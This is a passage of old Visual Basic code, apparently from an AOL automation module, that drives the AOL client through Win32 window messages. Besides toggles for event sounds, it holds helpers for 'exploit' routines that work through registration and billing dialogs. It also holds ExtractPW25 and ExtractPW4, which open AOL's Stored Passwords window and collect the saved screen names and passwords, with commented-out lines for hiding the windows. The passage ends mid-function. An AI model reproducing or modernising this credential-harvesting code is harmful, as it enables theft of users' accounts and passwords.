  2052. eChr$ = "c"
  2053. ElseIf eChr$ = "~" Then
  2054. eChr$ = "d"
  2055. ElseIf eChr$ = "!" Then
  2056. eChr$ = "e"
  2057. ElseIf eChr$ = "@" Then
  2058. eChr$ = "f"
  2059. ElseIf eChr$ = "#" Then
  2060. eChr$ = "g"
  2061. ElseIf eChr$ = "$" Then
  2062. eChr$ = "h"
  2063. ElseIf eChr$ = "%" Then
  2064. eChr$ = "i"
  2065. ElseIf eChr$ = "^" Then
  2066. eChr$ = "j"
  2067. ElseIf eChr$ = "&" Then
  2068. eChr$ = "k"
  2069. ElseIf eChr$ = "*" Then
  2070. eChr$ = "l"
  2071. ElseIf eChr$ = "(" Then
  2072. eChr$ = "m"
  2073. ElseIf eChr$ = ")" Then
  2074. eChr$ = "n" '12
  2075.  
  2076. ElseIf eChr$ = "," Then
  2077. eChr$ = "p"
  2078. ElseIf eChr$ = "." Then
  2079. eChr$ = "o"
  2080. ElseIf eChr$ = "?" Then
  2081. eChr$ = "q"
  2082. ElseIf eChr$ = "/" Then
  2083. eChr$ = "r"
  2084. ElseIf eChr$ = "<" Then
  2085. eChr$ = "s"
  2086. ElseIf eChr$ = ">" Then
  2087. eChr$ = "t" '18
  2088.  
  2089. ElseIf eChr$ = "_" Then
  2090. eChr$ = "u"
  2091. ElseIf eChr$ = "-" Then
  2092. eChr$ = "v"
  2093. ElseIf eChr$ = "=" Then
  2094. eChr$ = "w"
  2095. ElseIf eChr$ = "+" Then
  2096. eChr$ = "x" '22
  2097.  
  2098. ElseIf eChr$ = "[" Then
  2099. eChr$ = "y"
  2100. ElseIf eChr$ = "]" Then
  2101. eChr$ = "z"
  2102. ElseIf eChr$ = "{" Then
  2103. eChr$ = "1"
  2104. ElseIf eChr$ = "}" Then
  2105. eChr$ = "2"
  2106. ElseIf eChr$ = "\" Then
  2107. eChr$ = "3"
  2108. ElseIf eChr$ = "|" Then
  2109. eChr$ = "4" '28
  2110.  
  2111. ElseIf eChr$ = ";" Then
  2112. eChr$ = "5"
  2113. ElseIf eChr$ = ":" Then
  2114. eChr$ = "6"
  2115. ElseIf eChr$ = "'" Then
  2116. eChr$ = "7"
  2117. ElseIf eChr$ = "" + Chr(34) Then
  2118. eChr$ = "8" '32
  2119. End If
  2120.  
  2121. eFull$ = eFull$ + eChr$
  2122.  
  2123. '68
  2124. Next e
  2125.  
  2126. Encrypt$ = eFull$
  2127. End Function
  2128.  
  2129. Public Sub EventSoundsOff()
  2130. 'turns event sounds off using aol's preferences
  2131. 'aka: im sounds, gotmail, welcome, goodbye, etc..
  2132. Dim aol As Long, mdi As Long, PrefWin As Long, PrefButton As Long
  2133. Dim moda As Long, CheckA As Long, CheckR As Long, OKButt As Long
  2134.  
  2135. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  2136. Call EventSoundsOff25
  2137. Exit Sub
  2138. End If
  2139.  
  2140. aol& = FindWindow("AOL Frame25", vbNullString)
  2141. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2142.  
  2143. Call OpenPrefs
  2144.  
  2145. Do
  2146. DoEvents
  2147. PrefWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2148. PrefButton& = FindWindowEx(PrefWin&, 0&, "_AOL_Icon", vbNullString)
  2149. Loop Until PrefWin& <> 0& And PrefButton& <> 0&
  2150.  
  2151. Call PostMessage(PrefButton&, WM_LBUTTONDOWN, 0&, 0&)
  2152. Call PostMessage(PrefButton&, WM_LBUTTONUP, 0&, 0&)
  2153.  
  2154. Do
  2155. DoEvents
  2156. moda& = FindWindow("_AOL_Modal", "General Preferences")
  2157. CheckA& = FindWindowEx(moda&, 0&, "_AOL_Checkbox", vbNullString)
  2158. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2159. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2160. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2161. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2162. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2163. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2164. OKButt& = FindWindowEx(moda&, 0&, "_AOL_Icon", vbNullString)
  2165. Loop Until moda& <> 0& And CheckA& <> 0& And OKButt& <> 0&
  2166.  
  2167. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  2168. If CheckR = 1& Then
  2169. Do
  2170. DoEvents
  2171. Call SendMessage(CheckA&, WM_LBUTTONDOWN, 0&, 0&)
  2172. Call SendMessage(CheckA&, WM_LBUTTONUP, 0&, 0&)
  2173. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  2174. Loop Until CheckR& = 0
  2175. End If
  2176.  
  2177. Call PostMessage(OKButt&, WM_LBUTTONDOWN, 0&, 0&)
  2178. Call PostMessage(OKButt&, WM_LBUTTONUP, 0&, 0&)
  2179.  
  2180. Call PostMessage(PrefWin&, WM_CLOSE, 0&, 0&)
  2181. End Sub
  2182.  
  2183. Public Function EventSoundsOff25()
  2184. 'turns event sounds off using aol's preferences
  2185. 'aka: im sounds, gotmail, welcome, goodbye, etc..
  2186. Dim aol As Long, mdi As Long, pWin As Long, pButton As Long
  2187. Dim gpWin As Long, gpCheck As Long, gpButton As Long, gpCheckState As Long
  2188.  
  2189. aol& = FindWindow("AOL Frame25", vbNullString)
  2190. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2191.  
  2192. Call RunMenuByString("preferences")
  2193.  
  2194. Do
  2195. DoEvents
  2196. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2197. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2198. If AOLVersion = "3" Then
  2199. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2200. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2201. End If
  2202. Loop Until pWin& <> 0& And pButton& <> 0&
  2203.  
  2204. Call PostMessage(pButton&, WM_LBUTTONDOWN, 0&, 0&)
  2205. Call PostMessage(pButton&, WM_LBUTTONUP, 0&, 0&)
  2206.  
  2207. Do
  2208. DoEvents
  2209. gpWin& = FindWindow("_AOL_Modal", "General Preferences")
  2210. gpCheck& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "Enable event sounds")
  2211. gpButton& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "OK")
  2212. Loop Until gpWin& <> 0& And gpCheck& <> 0& And gpButton& <> 0&
  2213.  
  2214. gpCheckState& = SendMessage(gpCheck&, BM_GETCHECK, 0&, 0&)
  2215.  
  2216. If gpCheckState& = 1& Then
  2217. Call SendMessage(gpCheck&, WM_KEYDOWN, VK_SPACE, 0&)
  2218. Call SendMessage(gpCheck&, WM_KEYUP, VK_SPACE, 0&)
  2219. End If
  2220.  
  2221. Call PostMessage(gpButton&, WM_KEYDOWN, VK_SPACE, 0&)
  2222. Call PostMessage(gpButton&, WM_KEYUP, VK_SPACE, 0&)
  2223.  
  2224. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2225. End Function
  2226.  
  2227. Public Sub EventSoundsOn()
  2228. 'turns event sounds on using aol's preferences
  2229. 'aka: im sounds, gotmail, welcome, goodbye, etc..
  2230. Dim aol As Long, mdi As Long, PrefWin As Long, PrefButton As Long
  2231. Dim moda As Long, CheckA As Long, CheckR As Long, OKButt As Long
  2232.  
  2233. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  2234. Call EventSoundsOn25
  2235. Exit Sub
  2236. End If
  2237.  
  2238. aol& = FindWindow("AOL Frame25", vbNullString)
  2239. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2240.  
  2241. Call OpenPrefs
  2242.  
  2243. Do
  2244. DoEvents
  2245. PrefWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2246. PrefButton& = FindWindowEx(PrefWin&, 0&, "_AOL_Icon", vbNullString)
  2247. Loop Until PrefWin& <> 0& And PrefButton& <> 0&
  2248.  
  2249. Call PostMessage(PrefButton&, WM_LBUTTONDOWN, 0&, 0&)
  2250. Call PostMessage(PrefButton&, WM_LBUTTONUP, 0&, 0&)
  2251.  
  2252. Do
  2253. DoEvents
  2254. moda& = FindWindow("_AOL_Modal", "General Preferences")
  2255. CheckA& = FindWindowEx(moda&, 0&, "_AOL_Checkbox", vbNullString)
  2256. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2257. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2258. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2259. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2260. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2261. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  2262. OKButt& = FindWindowEx(moda&, 0&, "_AOL_Icon", vbNullString)
  2263. Loop Until moda& <> 0& And CheckA& <> 0& And OKButt& <> 0&
  2264.  
  2265. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  2266. If CheckR = 0& Then
  2267. Do
  2268. DoEvents
  2269. Call SendMessage(CheckA&, WM_LBUTTONDOWN, 0&, 0&)
  2270. Call SendMessage(CheckA&, WM_LBUTTONUP, 0&, 0&)
  2271. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  2272. Loop Until CheckR& = 1
  2273. End If
  2274.  
  2275. Call PostMessage(OKButt&, WM_LBUTTONDOWN, 0&, 0&)
  2276. Call PostMessage(OKButt&, WM_LBUTTONUP, 0&, 0&)
  2277.  
  2278. Call PostMessage(PrefWin&, WM_CLOSE, 0&, 0&)
  2279. End Sub
  2280.  
  2281. Public Function EventSoundsOn25()
  2282. 'turns event sounds off using aol's preferences
  2283. 'aka: im sounds, gotmail, welcome, goodbye, etc..
  2284. Dim aol As Long, mdi As Long, pWin As Long, pButton As Long
  2285. Dim gpWin As Long, gpCheck As Long, gpButton As Long, gpCheckState As Long
  2286.  
  2287. aol& = FindWindow("AOL Frame25", vbNullString)
  2288. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2289.  
  2290. Call RunMenuByString("preferences")
  2291.  
  2292. Do
  2293. DoEvents
  2294. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2295. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2296. If AOLVersion = "3" Then
  2297. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2298. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2299. End If
  2300. Loop Until pWin& <> 0& And pButton& <> 0&
  2301.  
  2302. Call PostMessage(pButton&, WM_LBUTTONDOWN, 0&, 0&)
  2303. Call PostMessage(pButton&, WM_LBUTTONUP, 0&, 0&)
  2304.  
  2305. Do
  2306. DoEvents
  2307. gpWin& = FindWindow("_AOL_Modal", "General Preferences")
  2308. gpCheck& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "Enable event sounds")
  2309. gpButton& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "OK")
  2310. Loop Until gpWin& <> 0& And gpCheck& <> 0& And gpButton& <> 0&
  2311.  
  2312. gpCheckState& = SendMessage(gpCheck&, BM_GETCHECK, 0&, 0&)
  2313.  
  2314. If gpCheckState& <> 1& Then
  2315. Call SendMessage(gpCheck&, WM_KEYDOWN, VK_SPACE, 0&)
  2316. Call SendMessage(gpCheck&, WM_KEYUP, VK_SPACE, 0&)
  2317. End If
  2318.  
  2319. Call PostMessage(gpButton&, WM_KEYDOWN, VK_SPACE, 0&)
  2320. Call PostMessage(gpButton&, WM_KEYUP, VK_SPACE, 0&)
  2321.  
  2322. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  2323. End Function
  2324.  
  2325. Public Function ExploitCancel1() As Long
  2326. 'this function helps find
  2327. '1 of the modals in the
  2328. '"createicase3" and "exploit3"
  2329. 'functions
  2330. Dim child As Long, aolstatic As Long
  2331.  
  2332. child& = FindWindow("_AOL_Modal", vbNullString)
  2333. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2334. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "are you sure you want to cancel your registration?") <> 0& Then
  2335. ExploitCancel1& = child&
  2336. Exit Function
  2337. Else
  2338. Do
  2339. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2340. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2341. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "are you sure you want to cancel your registration?") <> 0& Then
  2342. ExploitCancel1& = child&
  2343. Exit Function
  2344. End If
  2345. Loop Until child& = 0&
  2346. End If
  2347. ExploitCancel1& = child&
  2348. End Function
  2349.  
  2350. Public Function ExploitCancel2() As Long
  2351. 'this function helps find
  2352. '1 of the modals in the
  2353. '"createicase3" and "exploit3"
  2354. 'functions
  2355. Dim child As Long, aolstatic As Long
  2356.  
  2357. child& = FindWindow("_AOL_Modal", vbNullString)
  2358. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2359. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "thanks for trying!") <> 0& Then
  2360. ExploitCancel2& = child&
  2361. Exit Function
  2362. Else
  2363. Do
  2364. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2365. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2366. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "thanks for trying!") <> 0& Then
  2367. ExploitCancel2& = child&
  2368. Exit Function
  2369. End If
  2370. Loop Until child& = 0&
  2371. End If
  2372. ExploitCancel2& = child&
  2373. End Function
  2374.  
  2375. Public Function ExploitFind1() As Long
  2376. 'this function helps find
  2377. '1 of the modals in the
  2378. '"createicase3" and "exploit3"
  2379. 'functions
  2380. Dim child As Long, aolstatic As Long
  2381.  
  2382. child& = FindWindow("_AOL_Modal", vbNullString)
  2383. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2384. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "welcome to america online") <> 0& Then
  2385. ExploitFind1& = child&
  2386. Exit Function
  2387. Else
  2388. Do
  2389. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2390. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2391. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "welcome to america online") <> 0& Then
  2392. ExploitFind1& = child&
  2393. Exit Function
  2394. End If
  2395. Loop Until child& = 0&
  2396. End If
  2397. ExploitFind1& = child&
  2398. End Function
  2399.  
  2400. Public Function ExploitFind2() As Long
  2401. 'this function helps find
  2402. '1 of the modals in the
  2403. '"createicase3" and "exploit3"
  2404. 'functions
  2405. Dim child As Long, aolstatic As Long
  2406.  
  2407. child& = FindWindow("_AOL_Modal", vbNullString)
  2408. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2409. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "your aol instant messenger screen name") <> 0& Then
  2410. ExploitFind2& = child&
  2411. Exit Function
  2412. Else
  2413. Do
  2414. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2415. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2416. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "your aol instant messenger screen name") <> 0& Then
  2417. ExploitFind2& = child&
  2418. Exit Function
  2419. End If
  2420. Loop Until child& = 0&
  2421. End If
  2422. ExploitFind2& = child&
  2423. End Function
  2424.  
  2425. Public Function ExploitFind3() As Long
  2426. 'this function helps find
  2427. '1 of the modals in the
  2428. '"createicase3" and "exploit3"
  2429. 'functions
  2430. Dim child As Long, aolstatic As Long
  2431.  
  2432. child& = FindWindow("_AOL_Modal", vbNullString)
  2433. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2434. aolstatic& = FindWindowEx(child&, aolstatic&, "_AOL_Static", vbNullString)
  2435. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "registration information") <> 0& Then
  2436. ExploitFind3& = child&
  2437. Exit Function
  2438. Else
  2439. Do
  2440. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2441. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2442. aolstatic& = FindWindowEx(child&, aolstatic&, "_AOL_Static", vbNullString)
  2443. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "registration information") <> 0& Then
  2444. ExploitFind3& = child&
  2445. Exit Function
  2446. End If
  2447. Loop Until child& = 0&
  2448. End If
  2449. ExploitFind3& = child&
  2450. End Function
  2451.  
  2452. Public Function ExploitFind4() As Long
  2453. 'this function helps find
  2454. '1 of the modals in the
  2455. '"createicase3" and "exploit3"
  2456. 'functions
  2457. Dim child As Long, aolstatic As Long
  2458.  
  2459. child& = FindWindow("_AOL_Modal", vbNullString)
  2460. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2461. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "how your aol membership works") <> 0& Then
  2462. ExploitFind4& = child&
  2463. Exit Function
  2464. Else
  2465. Do
  2466. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2467. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2468. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "how your aol membership works") <> 0& Then
  2469. ExploitFind4& = child&
  2470. Exit Function
  2471. End If
  2472. Loop Until child& = 0&
  2473. End If
  2474. ExploitFind4& = child&
  2475. End Function
  2476.  
  2477. Public Function ExploitFind5() As Long
  2478. 'this function helps find
  2479. '1 of the modals in the
  2480. '"createicase3" and "exploit3"
  2481. 'functions
  2482. Dim child As Long, aolstatic As Long
  2483.  
  2484. child& = FindWindow("_AOL_Modal", vbNullString)
  2485. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2486. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "billing method") <> 0& Then
  2487. ExploitFind5& = child&
  2488. Exit Function
  2489. Else
  2490. Do
  2491. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2492. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2493. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "billing method") <> 0& Then
  2494. ExploitFind5& = child&
  2495. Exit Function
  2496. End If
  2497. Loop Until child& = 0&
  2498. End If
  2499. ExploitFind5& = child&
  2500. End Function
  2501.  
  2502. Public Function ExploitFind6() As Long
  2503. 'this function helps find
  2504. '1 of the modals in the
  2505. '"createicase3" and "exploit3"
  2506. 'functions
  2507. Dim child As Long, aolstatic As Long
  2508.  
  2509. child& = FindWindow("_AOL_Modal", vbNullString)
  2510. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2511. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "billing information") <> 0& Then
  2512. ExploitFind6& = child&
  2513. Exit Function
  2514. Else
  2515. Do
  2516. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2517. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2518. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "billing information") <> 0& Then
  2519. ExploitFind6& = child&
  2520. Exit Function
  2521. End If
  2522. Loop Until child& = 0&
  2523. End If
  2524. ExploitFind6& = child&
  2525. End Function
  2526.  
  2527. Public Function ExploitFindConditions() As Long
  2528. 'this function helps find
  2529. '1 of the modals in the
  2530. '"createicase3" and "exploit3"
  2531. 'functions
  2532. Dim child As Long, aolstatic As Long
  2533.  
  2534. child& = FindWindow("_AOL_Modal", vbNullString)
  2535. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2536. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "conditions of aol membership") <> 0& Then
  2537. ExploitFindConditions& = child&
  2538. Exit Function
  2539. Else
  2540. Do
  2541. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2542. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2543. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "conditions of aol membership") <> 0& Then
  2544. ExploitFindConditions& = child&
  2545. Exit Function
  2546. End If
  2547. Loop Until child& = 0&
  2548. End If
  2549. ExploitFindConditions& = child&
  2550. End Function
  2551.  
  2552. Public Function ExploitFindGTKAOL() As Long
  2553. 'this function helps find
  2554. '1 of the modals in the
  2555. '"createicase3" and "exploit3"
  2556. 'functions
  2557. Dim child As Long, aolstatic As Long
  2558.  
  2559. 'getting to know aol
  2560. child& = FindWindow("_AOL_Modal", vbNullString)
  2561. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2562. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "getting to know america online") <> 0& Then
  2563. ExploitFindGTKAOL& = child&
  2564. Exit Function
  2565. Else
  2566. Do
  2567. child& = FindWindowEx(0&, child&, "_AOL_Modal", vbNullString)
  2568. aolstatic& = FindWindowEx(child&, 0&, "_AOL_Static", vbNullString)
  2569. If aolstatic& <> 0& And InStr(1, LCase(GetText(aolstatic&)), "getting to know america online") <> 0& Then
  2570. ExploitFindGTKAOL& = child&
  2571. Exit Function
  2572. End If
  2573. Loop Until child& = 0&
  2574. End If
  2575. ExploitFindGTKAOL& = child&
  2576. End Function
  2577.  
  2578. Public Function ExtractPW25() As String
  2579. 'extracts user's password on aol 2.5 / 3.0
  2580. Dim aol As Long, mdi As Long, child As Long, Stored As String
  2581. Dim Mnu As Long, Pref As Long, pIcon As Long, sWin As Long
  2582. Dim sEdit As Long, sEdit2 As Long, sEdit3 As Long, sEdit4 As Long, sEdit5 As Long
  2583. Dim sStatic As Long, sStatic2 As Long, sStatic3 As Long, sStatic4 As Long, sStatic5 As Long
  2584. Dim sIcon As Long, SN1 As String, PW1 As String, SN2 As String, PW2 As String
  2585. Dim SN3 As String, PW3 As String, SN4 As String, PW4 As String, SN5 As String, PW5 As String
  2586.  
  2587.  
  2588. aol& = FindWindow("AOL Frame25", vbNullString)
  2589. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2590. child& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  2591.  
  2592. 'Call ShowWindow(AOL&, SW_HIDE)
  2593.  
  2594. Call RunMenuByString("preferences")
  2595.  
  2596. Do
  2597. DoEvents
  2598. Pref& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2599. pIcon& = FindWindowEx(Pref&, 0&, "_AOL_Icon", vbNullString)
  2600. pIcon& = FindWindowEx(Pref&, pIcon&, "_AOL_Icon", vbNullString)
  2601. If AOLVersion = "3" Then
  2602. pIcon& = FindWindowEx(Pref&, pIcon&, "_AOL_Icon", vbNullString)
  2603. pIcon& = FindWindowEx(Pref&, pIcon&, "_AOL_Icon", vbNullString)
  2604. End If
  2605. Loop Until Pref& <> 0& And pIcon& <> 0&
  2606.  
  2607. 'Call ShowWindow(Pref&, SW_HIDE)
  2608.  
  2609. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  2610. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  2611.  
  2612. Do
  2613. DoEvents
  2614. sWin& = FindWindow("_AOL_Modal", "Edit Stored Passwords")
  2615. sEdit& = FindWindowEx(sWin&, 0&, "_AOL_Edit", vbNullString)
  2616. sEdit2& = FindWindowEx(sWin&, sEdit&, "_AOL_Edit", vbNullString)
  2617. sEdit3& = FindWindowEx(sWin&, sEdit2&, "_AOL_Edit", vbNullString)
  2618. sEdit4& = FindWindowEx(sWin&, sEdit3&, "_AOL_Edit", vbNullString)
  2619. sEdit5& = FindWindowEx(sWin&, sEdit4&, "_AOL_Edit", vbNullString)
  2620. If AOLVersion = "3" Then
  2621. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  2622. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2623. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2624. Else
  2625. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  2626. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2627. End If
  2628. sStatic& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2629. sStatic2& = FindWindowEx(sWin&, sStatic&, "_AOL_Static", vbNullString)
  2630. sStatic3& = FindWindowEx(sWin&, sStatic2&, "_AOL_Static", vbNullString)
  2631. sStatic4& = FindWindowEx(sWin&, sStatic3&, "_AOL_Static", vbNullString)
  2632. sStatic5& = FindWindowEx(sWin&, sStatic4&, "_AOL_Static", vbNullString)
  2633. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Button", "Cancel")
  2634. Loop Until sWin& <> 0& And sEdit& <> 0& And sStatic& <> 0& And sIcon& <> 0&
  2635.  
  2636. 'Stored$ = "[Stored]" + vbCrLf
  2637.  
  2638. 'Call ShowWindow(sWin&, SW_HIDE)
  2639.  
  2640. SN1$ = Trim(GetText(sStatic&))
  2641. PW1$ = GetText(sEdit&)
  2642. If PW1$ <> "" Then
  2643. Stored$ = "" + SN1$ + ":" + PW1$ + "" + vbCrLf
  2644. End If
  2645.  
  2646. SN2$ = Trim(GetText(sStatic2&))
  2647. PW2$ = GetText(sEdit2&)
  2648. If SN2$ <> "Guest" And SN2$ <> "New Local#" Then
  2649. If PW2$ <> "" Then
  2650. Stored$ = Stored$ + "" + SN2$ + ":" + PW2$ + "" + vbCrLf
  2651. End If
  2652. End If
  2653.  
  2654. SN3$ = Trim(GetText(sStatic3&))
  2655. PW3$ = GetText(sEdit3&)
  2656. If SN3$ <> "Guest" And SN3$ <> "New Local#" Then
  2657. If PW3$ <> "" Then
  2658. Stored$ = Stored$ + "" + SN3$ + ":" + PW3$ + "" + vbCrLf
  2659. End If
  2660. End If
  2661.  
  2662. SN4$ = Trim(GetText(sStatic4&))
  2663. PW4$ = GetText(sEdit4&)
  2664. If SN4$ <> "Guest" And SN4$ <> "New Local#" Then
  2665. If PW4$ <> "" Then
  2666. Stored$ = Stored$ + "" + SN4$ + ":" + PW4$ + "" + vbCrLf
  2667. End If
  2668. End If
  2669.  
  2670. SN5$ = Trim(GetText(sStatic5&))
  2671. PW5$ = GetText(sEdit5&)
  2672. If SN5$ <> "Guest" And SN5$ <> "New Local#" Then
  2673. If PW5$ <> "" Then
  2674. Stored$ = Stored$ + "" + SN5$ + ":" + PW5$ + "" + vbCrLf
  2675. End If
  2676. End If
  2677.  
  2678. Call PostMessage(sIcon&, WM_KEYDOWN, VK_SPACE, 0&)
  2679. Call PostMessage(sIcon&, WM_KEYUP, VK_SPACE, 0&)
  2680.  
  2681. Call PostMessage(Pref&, WM_CLOSE, 0&, 0&)
  2682.  
  2683. If Stored$ = "" Then
  2684. Stored$ = "[no pw's were stored]"
  2685. Else
  2686. Stored$ = "[Stored]" + vbCrLf + Stored$
  2687. End If
  2688.  
  2689. ExtractPW25 = Stored$
  2690. End Function
  2691.  
  2692. Public Function ExtractPW4() As String
  2693. 'extracts user's password on aol 4.0
  2694. Dim aol As Long, mdi As Long, tool As Long, Toolbar As Long, CurPos As POINTAPI
  2695. Dim WinVis As Long, sMod As Long, pWin As Long, pButton As Long
  2696. Dim sWin As Long, sStatic As Long, mWin As Long, mBut As Long
  2697. Dim sStatic1 As Long, sStatic2 As Long, sStatic3 As Long, sStatic4 As Long, sStatic5 As Long, sStatic6 As Long, sStatic7 As Long
  2698. Dim sEdit1 As Long, sEdit2 As Long, sEdit3 As Long, sEdit4 As Long, sEdit5 As Long, sEdit6 As Long, sEdit7 As Long
  2699. Dim sSN1 As String, sSN2 As String, sSN3 As String, sSN4 As String, sSN5 As String, sSN6 As String, sSN7 As String
  2700. Dim sPW1 As String, sPW2 As String, sPW3 As String, sPW4 As String, sPW5 As String, sPW6 As String, sPW7 As String
  2701. Dim Stored As String
  2702.  
  2703. aol& = FindWindow("AOL Frame25", vbNullString)
  2704. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  2705.  
  2706. Call OpenPrefs
  2707.  
  2708. Do
  2709. DoEvents
  2710. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  2711. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2712. Do
  2713. DoEvents
  2714. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2715. Loop Until pButton& = 0&
  2716.  
  2717. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  2718. Do
  2719. DoEvents
  2720. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  2721. Loop Until pButton& = 0&
  2722.  
  2723. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
